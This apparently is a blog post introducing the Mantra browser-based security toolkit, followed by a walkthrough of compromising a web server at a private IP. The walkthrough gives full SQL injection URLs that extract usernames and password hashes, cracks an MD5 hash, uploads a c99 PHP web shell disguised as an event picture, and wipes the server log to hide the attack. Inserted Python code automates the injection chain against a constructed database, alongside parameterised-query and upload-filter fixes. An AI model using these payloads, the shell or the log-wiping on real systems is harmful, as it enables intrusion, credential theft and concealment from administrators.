Right from the beginning, one of the attractive features that made both Firefox and Google Chrome stand out was their extensibility through installable extensions or add-ons. Programmers and developers started coding add-ons that made the web easier to use and more functional.
Naturally, add-ons were developed for hackers too. Some became outdated, some were very powerful, and some went unnoticed despite their powerful capabilities. We tried to collect all the add-ons of this type available on the internet, installed, analyzed and ranked them, and then included them in our own security toolkit.
Looking at the number of exploits being added to Exploit-DB, we think that a browser-based exploit development framework can gain good acceptance in the security and hacking communities, and this triggered the creation of Mantra.
As of now Mantra is just a security toolkit rather than a full-fledged framework. We think it is always better to give the end user a choice rather than providing what we think is best. So once the community is up and we have a crowd, we will go ahead and finalize the basic criteria for the framework and work on their behalf.
Some of the features of Mantra
1. It is built on top of the browser, which saves a lot of manpower and flattens the learning curve.
2. It is cross-platform and flexible: it runs natively on Windows, Mac and Linux.
3. It is free as in "free beer" and as in "free speech".
4. It is open source, so you are free to use it or modify it your own way.
What is the use?
By present-day standards, Mantra can help with all the standard phases of an attack: reconnaissance, scanning and enumeration, gaining access, escalation of privileges, maintaining access and covering tracks.
What Mantra is NOT?
1. It is not a one-click automatic pwnage tool
(please don't think of it as a magician's wand. It may be possible for us to make it a one-click pwnage tool for some common types of attacks in the future, but not now)
2. It is not mature enough to provide "everything" a user needs to perform any sort of attack
3. It cannot replace your normal browser. It is not fast enough, does not leave plenty of room to play with, etc.
4. You will find more than one tool in the toolkit for performing the same sort of attack, while at the same time some simple tools are missing here and there.
Who needs it?
Nice question. If you are into auditing, vulnerability assessment, penetration testing, information security training or similar work, you will benefit from this project. We want to draw the attention of security researchers to the possibilities of such a platform. If many people use it, the community will grow and we will see more powerful, functional and targeted tools in the near future.
How can you contribute?
Since it is an open source project, you are encouraged to become a part of it. We need developers to write code and modify the extension framework, theme designers for artwork, and documentation writers to help promote the project.
The beta version of the Mantra Security Toolkit can be downloaded from http://getmantra.com/download/. As of now it is available for both Linux and Windows platforms. It comes as a self-extracting archive and needs almost
The graphical user interface of the Mantra security toolkit is straightforward and easy to use.
The navigation bar sits at the top of the toolkit and integrates the search bar. Search engines can be switched easily by typing keywords or by clicking on their respective icons. As of now it supports searching XSSed, SecurityFocus, OSVDB, PacketStorm, Pcapr, Exploit-DB, Scroogle, RFC, OVAL and others, apart from the normal search engines. It also supports auto-complete and real-time search suggestions.
The sidebar, on the right side of the toolkit, gives one-click access to all the tools in the toolkit. Tools can be fine-tuned to the user's needs from the sidebar itself. You can see all the tools packed into it at http://getmantra.com/tools/
The status bar at the bottom shows various details about the current web page, including the remote IP, location details and the technologies used. More detail about a particular item can be obtained by simply clicking on the respective notification in the status bar. There is also a proxy button for switching between proxies, a Passive Reconnaissance button for packetless discovery of target resources, a quick profile switcher for playing with cookies, and so on.
A quick demo
In this particular demo we will try to compromise a remote web server using the Mantra security toolkit.
Due to space limitations I have not included the screenshots. To view them, please follow the image links mentioned under every step.
I’m on the home page of the website now.
As of now Mantra has no crawling mechanism for finding vulnerable URLs on a website (read that as a limitation), so that has to be done manually. I went through all the pages of the website and found a page that takes a parameter in the URL.
I launched Hackbar by pressing F9. Hackbar is a tool for doing basic checks against web pages.
The power of a single quote. I check whether the website is actually sanitizing its input by putting a ' at the end of the URL and pressing the Execute button.
Since the page content differs from the previous one, I can be sure that the web page is not sanitizing the input from the URL.
Let's find out the number of columns the page's query selects. ORDER BY n sorts by the nth column of the SELECT, so it errors out as soon as n exceeds the column count.
[code]http://192.168.132.128/?id=13 order by 1[/code]
I have to keep increasing the last number until I see a change in the page. Done by hand this is tedious, but with this tool I can simply press the + button until the page changes.
[code]http://192.168.132.128/?id=13 order by 7[/code]
I went up to 7 with no change so far.
I'm on 8 now and the page has changed.
[code]http://192.168.132.128/?id=13 order by 8[/code]
Now let's go ahead and build a UNION statement. I can do that easily by going to SQL > UNION SELECT STATEMENT
I provided the number of columns. Since the page changed at ORDER BY 8, I know that column 8 does not exist and the query selects exactly 7 columns, which is the number the UNION SELECT has to match.
Wonderful. I can see some numbers on the page now. Those are the columns whose values the page displays, so whatever I select into those positions will be shown. Let's take number 2.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7[/code]
I replaced the number 2 in the URL with a SQL function call; it got executed and the result is displayed on the page.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7[/code]
The current user is [email protected]
Let's find out the version of the database. I replaced the 2 in the URL with the version() function.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7[/code]
The database is MySQL 5.0.45.
Let me list all the tables.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables[/code]
From this list I found “user” as an interesting table.
Now I listed all the columns, and it's a big list.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns[/code]
I want to filter out the columns of the table "user".
[code]http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'[/code]
Let's find the user name.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user[/code]
And password, of course.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user[/code]
Cracking the password hash. Judging by its length (32 hex characters) and format, I'm guessing the password is stored as an unsalted MD5 hash, which is not encryption but a one-way digest that can be looked up in precomputed tables. I copied the MD5 hash, pasted it into the Hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
Voila! The lookup returned the password.
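The injection chain above (the single-quote test, the ORDER BY column count, the UNION row of markers, the catalogue lookups and the MD5 lookup) as one script. This is an added example, not code from the original post or from the Mantra project. It assumes a constructed stand-in target: an in-memory SQLite database with invented event and user rows (the hash is md5 of "password"), so the MySQL-specific pieces are swapped for their SQLite equivalents (sqlite_master and pragma_table_info for information_schema, || for concat(), a three-word wordlist for md5.rednoize.com). The events column names, the page template and the hardened variant are also assumptions. It goes beyond the demo by automating each probe and by running the same chain against the page with a bound parameter, where it stops.

```python
import hashlib
import re
import sqlite3


# Constructed stand-in for the demo target: an events page that takes ?id=N,
# plus a "user" table with the column names the demo pulled out. All data is
# invented; the stored hash is md5("password").
def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE events(id INTEGER, title TEXT, body TEXT, place TEXT,
                            day TEXT, owner TEXT, pic TEXT);
        INSERT INTO events VALUES (13, 'Launch party', 'Doors open at 8',
                                   'Hall A', '2010-05-01', 'admin', 'launch.png');
        CREATE TABLE user(user_id INTEGER, user_username TEXT, user_password TEXT);
        INSERT INTO user VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return con


def render(rows):
    # The (assumed) template shows only title (column 2) and body (column 3):
    # those are the only slots an injected UNION row can surface through.
    if not rows:
        return "No event"
    return "".join(f"<h1>{r[1]}</h1><p>{r[2]}</p>" for r in rows)


def vulnerable_page(con, id_param):
    """String-built query: the id parameter is parsed as SQL, the defect the demo exploits."""
    sql = f"SELECT id,title,body,place,day,owner,pic FROM events WHERE id={id_param}"
    try:
        return render(con.execute(sql).fetchall())
    except sqlite3.Error:
        return "Error"


def hardened_page(con, id_param):
    """Same page with a bound parameter: the payload is compared as a value, never parsed."""
    sql = "SELECT id,title,body,place,day,owner,pic FROM events WHERE id=?"
    return render(con.execute(sql, (id_param,)).fetchall())


# --- attacker side: the Hackbar steps as code ---------------------------------

def is_injectable(page, base="13"):
    """The single-quote test. Note it also fires on the hardened page, because a
    non-matching id simply renders 'No event'; the ORDER BY probe below is what confirms."""
    return page(base + "'") != page(base)


def column_count(page, base="13", limit=20):
    """ORDER BY probe: the first n that changes the page is one past the column count.
    If ORDER BY 1 already changes it, the input is not being parsed as SQL at all."""
    baseline = page(base)
    for n in range(1, limit + 1):
        if page(f"{base} order by {n}") != baseline:
            return n - 1 if n > 1 else None
    return None


def reflected_columns(page, ncols, base="13"):
    """UNION a row of unique markers; a marker visible in the page marks a displayed column."""
    markers = [f"mk{i}x" for i in range(1, ncols + 1)]
    body = page(f"{base} UNION SELECT " + ",".join(f"'{m}'" for m in markers))
    return [i for i, m in enumerate(markers, 1) if m in body]


def extract(page, ncols, col, expr, from_clause="", base="13"):
    """Put expr in a reflected slot, wrapped in <<...>> so it can be cut out of the HTML.
    '||' is SQLite concatenation; against MySQL you would use concat()."""
    slots = ["1"] * ncols
    slots[col - 1] = f"'<<'||({expr})||'>>'"
    body = page(f"{base} UNION SELECT {','.join(slots)} {from_clause}")
    return re.findall(r"<<(.*?)>>", body)


def crack_md5(hexdigest, wordlist):
    """Unsalted MD5 has no per-user randomness, so one table cracks every copy of a
    common password; md5.rednoize.com is a very large version of this loop."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == hexdigest:
            return word
    return None


def run_demo(page_func):
    """Replay the demo's chain and return what it recovered, or None if the page resists."""
    con = build_db()
    page = lambda p: page_func(con, p)
    if not is_injectable(page):
        return None
    n = column_count(page)
    if n is None:
        return None
    col = reflected_columns(page, n)[0]
    tables = extract(page, n, col, "name", "FROM sqlite_master WHERE type='table'")
    cols = extract(page, n, col, "name", "FROM pragma_table_info('user')")
    creds = extract(page, n, col, "user_username||':'||user_password", "FROM user")
    user, h = creds[0].split(":")
    return {"columns": n, "reflected": col, "tables": sorted(tables),
            "user_columns": sorted(cols), "user": user,
            "password": crack_md5(h, ["123456", "letmein", "password"])}


if __name__ == "__main__":
    print(run_demo(vulnerable_page))   # full chain succeeds
    print(run_demo(hardened_page))     # None: ORDER BY 1 already changes the page
```

Two things the script makes visible that the screenshots do not: the single-quote test alone is not proof (the bound-parameter page also changes, just by showing no event), so the ORDER BY step doubles as confirmation; and the whole chain rests on the query being built by string concatenation, so the fix on the server side is the one-line change in hardened_page, not input filtering.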
Finding the login page. It was right in front of me.
Logging in with the credentials I have.
I'm an admin now. Look at my powers.
Let me add an event.
And of course I want to upload a picture.
Let me test the website's filtering mechanism again. I'm trying to upload a PHP shell through the website's custom picture upload. Let's see whether it's possible or not.
Now I’m pressing on “Add Event” button.
Nice. Looks like it got uploaded.
Let’s see where the shell got uploaded to.
I’m trying to get the default upload location.
Looks like I got it.
Let me click on the c9shell.php file I just uploaded.
Voila. I have shell access!!
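The upload test in the steps above, as an added example that is not code from the original post or from the target site. The demo does not show what filter the site applied, so the weak version here assumes the common pattern of trusting the browser-supplied Content-Type and keeping the client's file name; the strict version shows the checks that would have stopped a .php file from landing in a picture folder. The sample uploads are constructed.

```python
import secrets

# Allowed picture types and the bytes each one must start with.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# Constructed uploads: a minimal PNG header and a PHP shell sent under an image type.
PNG_BYTES = MAGIC["png"] + b"\x00\x00\x00\rIHDR"
PHP_SHELL = b"<?php system($_GET['c']); ?>"


def weak_accept(filename, content_type, data):
    """Assumed weak filter: trusts the browser's Content-Type and stores the file
    under the name the client chose, so c9shell.php lands on disk as executable PHP."""
    if not content_type.startswith("image/"):
        return None
    return filename


def strict_accept(filename, content_type, data):
    """Allowlist the extension, require the bytes to match it, reject embedded PHP,
    and choose the stored name ourselves. Serve the upload folder with script
    execution disabled as well; a filter alone should not be the only line."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in MAGIC:
        return None                      # .php, .phtml, .php5, no extension ...
    if not data.startswith(MAGIC[ext]):
        return None                      # shell.php.png with no image header
    if b"<?php" in data or b"<?=" in data:
        return None                      # polyglot: real image bytes with PHP appended
    return f"{secrets.token_hex(8)}.{ext}"  # new name: client cannot pick the path
```

Notice that strict_accept never looks at content_type: the browser sets it, so the attacker does, and it carries no information the bytes themselves do not.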
I simply clicked on the up button to get to the root folder.
Now I can do whatever I wish: deface the website, maintain access, or whatever.
What I'm interested in is the log folder.
I clicked on the log.log file, and it holds the logs of my noisy SQL injection attacks. Since the shell runs as the web server's account, that account evidently has write access to the log.
Let me go back and edit the log file.
I deleted all the log entries. Now saving it.
Nice. The log file is empty now.
Now let's remove the c99 shell by pressing Self Remove.
OK. Goodbye C99!!!
Well, it deleted itself.
Happy Hacking.!!! 🙂